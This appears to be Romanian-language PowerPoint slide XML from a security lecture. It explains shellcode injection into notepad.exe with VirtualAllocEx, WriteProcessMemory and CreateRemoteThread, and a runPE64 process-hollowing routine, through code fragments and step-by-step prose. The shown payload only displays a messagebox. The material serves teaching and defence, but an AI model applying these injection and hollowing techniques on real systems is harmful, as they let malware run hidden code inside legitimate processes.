      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="351985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Procesul de injecție de shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Prima parte a codului inițiază un payload, care este esențial un bloc de cod în limbaj de asamblare, convertit în format hexazecimal. Acesta poate fi folosit pentru a executa operații specifice, în cazul nostru afișarea unui </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>messagebox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>După inițializarea payload-ului, următoarea funcție importantă prezentată este </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FindTarget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, care are rolul de a localiza procesul dorit pe baza numelui său, returnând PID-ul acestuia. Folosim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CreateToolhelp32Snapshot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>pentru a crea o instantanee a tuturor proceselor curente, iar apoi iterăm prin aceste procese cu ajutorul </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Process32First </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>și </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Process32Next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>până când găsim procesul target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Aceste funcții sunt fundamentale în înțelegerea modului în care un atacator poate injecta cod arbitrar într-un proces rulat pe un sistem de operare Windows. Discuțiile noastre de astăzi sunt cruciale pentru a înțelege riscurile de securitate la care suntem expuși și pentru a dezvolta metode de apărare împotriva acestor tipuri de atacuri.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624114" y="1516517"/>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082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936" y="147365"/>
            <a:ext cx="6096000" cy="6461769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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Inject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HANDLE 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unsigned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unsigned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payload_len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LPVOID pRemoteCode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HANDLE hThread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pRemoteCode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VirtualAllocEx</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payload_len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MEM_COMMIT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PAGE_EXECUTE_READ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WriteProcessMemory</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pRemoteCode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PVOID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payload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SIZE_T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payload_len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SIZE_T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hThread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CreateRemoteThread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LPTHREAD_START_ROUTINE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pRemoteCode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WaitForSingleObject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500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main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void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HANDLE hProc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FindTarget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"notepad.exe"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printf</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"Notepad.exe PID = %d\n"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DESCHIDE PROCES TINTA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hProc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OpenProcess</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PROCESS_CREATE_THREAD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PROCESS_QUERY_INFORMATION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PROCESS_VM_OPERATION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PROCESS_VM_READ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PROCESS_VM_WRITE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FALSE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Inject</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payload_len</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9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821424" y="2701414"/>
            <a:ext cx="5017008" cy="3647152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Funcția Inject - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>Realizează injectarea propriu-zisă a shellcode-ului în procesul țintă:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>int Inject(HANDLE hProc, unsigned char * payload, unsigned int payload_len) { ... }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VirtualAllocEx - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>Rezervă spațiu în procesul țintă pentru shellcode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WriteProcessMemory - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>Scrie shellcode-ul în spațiul rezervat din procesul țintă.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CreateRemoteThread </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>- Creează un fir de execuție în procesul țintă care începe execuția la shellcode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Funcția main - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>Punctul de intrare principal al programului:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>int main(void) { ... }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FindTarget - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>Se folosește pentru a obține PID-ul procesului notepad.exe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenProcess - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>Obține un handle pentru procesul cu PID-ul specificat, cu drepturi de a crea un thread și a scrie în memorie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>Apelează funcția de injectare a shellcode-ului în procesul deschis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execuția și Verificarea - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>Când executați s.exe, shellcode-ul va încerca să injecteze și să execute messagebox-ul în notepad.exe. Dacă notepad.exe nu rulează, sau dacă nu există drepturi suficiente, injectarea nu va avea loc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6412992"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6821424" y="102995"/>
            <a:ext cx="5056632" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Injectia de Shellcode (II)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6778660" y="1389251"/>
            <a:ext cx="5099396" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Shellcode-ul este un set de instrucțiuni în limbaj de mașină utilizat adesea în exploit-uri pentru a controla comportamentul unui program afectat de o vulnerabilitate; pentru a crea un shellcode eficient, este esențial să fie compact, să evite caracterele nule și alte secvențe care ar putea termina prematur execuția și să fie adaptat la specificațiile mediului țintă, cum ar fi arhitectura sistemului și offset-urile de memorie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147574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Detaliile tehnice ale funcțiilor utilizate </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Funcția Inject. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Aici folosim funcții native API de Windows pentru a rezerva spațiu în procesul țintă (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VirtualAllocEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>), pentru a scrie shellcode-ul în spațiul alocat (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WriteProcessMemory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>) și pentru a crea un fir de execuție în procesul țintă care începe execuția shellcode-ului (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CreateRemoteThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>). Aceste operații sunt critice pentru succesul injectării, deoarece permit executarea codului arbitrar într-un proces care rulează.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Detaliem apoi în funcția </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> procesul de identificare a procesului țintă și de apelare a funcției Inject. Începem cu identificarea PID-ului procesului </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>notepad.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>folosind funcția </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FindTarget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, care este esențială pentru a obține handle-ul necesar pentru injectare. După aceea, validăm dacă procesul este deschis și, dacă da, apelăm Inject.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Această metodologie ne oferă un exemplu clar despre cum pot fi exploatate vulnerabilitățile pentru a controla procesele la un nivel foarte detaliat. Este crucial să înțelegem aceste tehnici pentru a putea să ne protejăm mai bine sistemele și informațiile sensibile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159584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1689" y="111996"/>
            <a:ext cx="4477512" cy="1013254"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Injectare procese (I)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48768" y="0"/>
            <a:ext cx="3145454" cy="6677469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8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#undef UNICODE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#define UNICODE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&lt;Windows.h&gt;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runPE64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LPPROCESS_INFORMATION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LPSTARTUPINFO lpSI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LPVOID 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LPWSTR wszArgs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SIZE_T szArgs</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WCHAR wszFilePath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MAX_PATH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GetModuleFileName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wszFilePath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wszFilePath</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WCHAR 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MAX_PATH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2048</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ZeroMemory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SIZE_T length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wcslen</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wszFilePath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memcpy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wszFilePath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WCHAR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memcpy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wszArgsBuffer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szArgs</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PIMAGE_DOS_HEADER lpDOSHeader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PIMAGE_DOS_HEADER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PIMAGE_NT_HEADERS lpNTHeader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PIMAGE_NT_HEADERS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lpDOSHeader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e_lfanew</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Signature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IMAGE_NT_SIGNATURE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3242701" y="0"/>
            <a:ext cx="3195169" cy="6150658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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CreateProcess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wszArgsBuffer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TRUE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CREATE_SUSPENDED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lpSI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3</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CONTEXT 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ZeroMemory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ContextFlags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CONTEXT_FULL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GetThreadContext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4</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LPVOID lpImageBase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VirtualAllocEx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OptionalHeader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ImageBase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OptionalHeader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SizeOfImage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MEM_COMMIT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MEM_RESERVE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PAGE_EXECUTE_READWRITE</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lpImageBase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5</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5</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230761" y="1261242"/>
            <a:ext cx="4619368" cy="4662815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>Codul prezentat este un exemplu de tehnică de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injectare a unui proces </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>în Windows, utilizând API-ul Windows pentru a crea și manipula procese. Aici este o descriere pas cu pas a principalelor componente și acțiuni ale codului:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preprocesorul Directive - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>#undef UNICODE și #define UNICODE asigură că toate apelurile de funcții care pot fi definite atât în versiunea ANSI cât și în UNICODE vor folosi versiunea UNICODE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Includerea Antetului Windows - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>#include &lt;Windows.h&gt; este necesar pentru a utiliza funcționalitățile API-ului Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Funcția runPE64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>Parametrii funcției includ informații despre proces (PROCESS_INFORMATION), informații pentru inițializarea procesului (STARTUPINFO), imaginea procesului în memorie, argumentele și dimensiunea acestora.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Obținerea căii executabilului - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>Prin GetModuleFileName, funcția extrage calea fișierului executabil al procesului curent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pregătirea argumentelor: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>Concatenează calea executabilului cu argumentele primite pentru a fi folosite în crearea noului proces.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verificarea headerului PE - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>Verifică dacă imaginea în memorie este un executabil valid folosind semnătura IMAGE_NT_SIGNATURE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Crearea procesului - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>Folosind CreateProcess cu starea CREATE_SUSPENDED pentru a opri execuția imediată a noului proces.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3148503"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65737"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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7139322" y="1125250"/>
            <a:ext cx="4784163" cy="531183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232558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Tehnica de injectare a proceselor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>In cod se detaliază o funcție numită </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>runPE64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, care exemplifică cum se poate crea și manipula un proces în Windows. În primul rând, vedem că funcția folosește API-ul Windows pentru a obține calea executabilului curent printr-o apelare la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GetModuleFileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. Aceasta este esențială pentru a determina contextul în care rulăm.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Următoarea parte a codului folosește </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CreateProcess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> pentru a crea un nou proces într-o stare suspendată. Aceasta este o tehnică comună utilizată pentru a injecta cod înainte ca procesul să înceapă să execute codul său. Prin specificarea flag-ului </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CREATE_SUSPENDED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, avem posibilitatea de a modifica imaginile și contextul procesului înainte de a-l reporni.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Odată creat procesul, funcția preia contextul thread-ului său principal cu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GetThreadContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, modifică registrii pentru a îndrepta executarea spre o secțiune de memorie nouă, unde se poate injecta shellcode sau alt cod arbitrar. După ajustarea contextului, procesul este repornit pentru a executa codul injectat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Finalizăm cu verificarea validității imaginii în memorie, asigurându-ne că semnătura </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IMAGE_NT_SIGNATURE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>este prezentă, ceea ce confirmă că imaginea este un executabil valid.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Aceste tehnici sunt vitale pentru înțelegerea metodelor prin care software-ul rău intenționat poate prelua controlul asupra sistemelor și cum putem detecta sau preveni astfel de comportamente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8744857" y="455159"/>
            <a:ext cx="3447143" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>Tehnica de injectare a proceselor este un aspect esențial pentru cei interesați de securitatea cibernetică și de modul în care malware-ul poate manipula și controla procesele într-un sistem de operare Windows.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624114" y="1610860"/>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45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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng"/>
              <a:t>C.12.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Phising</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034045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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7874000" y="1371600"/>
            <a:ext cx="4114800" cy="516708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4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="191247"/>
            <a:ext cx="3751511" cy="5621732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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WriteProcessMemory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lpImageBase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OptionalHeader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SizeOfHeaders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6</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6</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SIZE_T iSection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iSection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FileHeader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NumberOfSections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iSection</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PIMAGE_SECTION_HEADER stSectionHeader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PIMAGE_SECTION_HEADER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lpDOSHeader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e_lfanew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IMAGE_NT_HEADERS64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IMAGE_SECTION_HEADER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iSection</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WriteProcessMemory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lpImageBase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stSectionHeader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VirtualAddress</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stSectionHeader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PointerToRawData</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stSectionHeader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SizeOfRawData</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3864864" y="92393"/>
            <a:ext cx="3604796" cy="5358326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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WriteProcessMemory</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Rdx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lpImageBase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8</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8</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stCtx</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Rcx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DWORD64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lpImageBase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lpNTHeader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OptionalHeader</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AddressOfEntryPoint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SetThreadContext</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stCtx</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9</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9</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3819144"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67360"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28000" y="1743539"/>
            <a:ext cx="3722913" cy="4401205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
